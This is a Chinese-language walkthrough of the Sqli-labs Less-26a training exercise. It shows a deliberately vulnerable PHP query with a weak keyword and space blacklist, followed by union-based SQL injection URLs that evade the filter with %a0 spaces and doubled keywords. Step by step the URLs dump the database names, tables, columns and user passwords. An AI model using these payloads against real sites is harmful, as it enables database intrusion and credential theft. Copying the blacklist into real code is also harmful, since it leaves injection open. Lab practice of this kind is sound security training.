Sqli-labs Less-26a 绕过 or、and、注释符、空格、斜杠过滤 union注入

关键代码

function blacklist($id)
{
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[/*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[/\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
//print_r(mysql_error());

这关与less26的区别在于，sql语句添加了一个括号，同时在sql语句执行抛出错误后并不在前台页面输出。所以我们排除报错注入，这里利用union注入。

我们构造payload：

http://127.0.0.1/sqllib/Less-26a/?id=100')union%a0select%a01,2,3||('1

Explain：基础与less26一致，我们直接用 ') 闭合前面的，然后跟上自己构造的注入语句即可。最后利用（'1 进行闭合即可。

1、爆当前数据库

http://127.0.0.1/sql/Less-26a/?id=100')union select 1,database(),('3

将空格替换为%a0

http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,database(),('3

2、爆数据库

http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(schema_name) from information_schema.schemata),('3

将空格替换为%a0，将information_schema替换为infoorrmation_schema

http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(schema_name)%a0from%a0infoorrmation_schema.schemata),('3

3、爆数据表

http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),('3

将空格替换为%a0，将information_schema替换为infoorrmation_schema

http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'),('3

4、爆数据列

http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),('3

将空格替换为%a0，将information_schema替换为infoorrmation_schema，将and替换为aandnd

http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0aandnd%a0table_name='users'),('3

5、爆内容

http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(username,0x3a,password) from users),('3

将空格替换为%a0，将password替换为passwoorrd

http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(username,0x3a,passwoorrd)%a0from%a0security.users),('3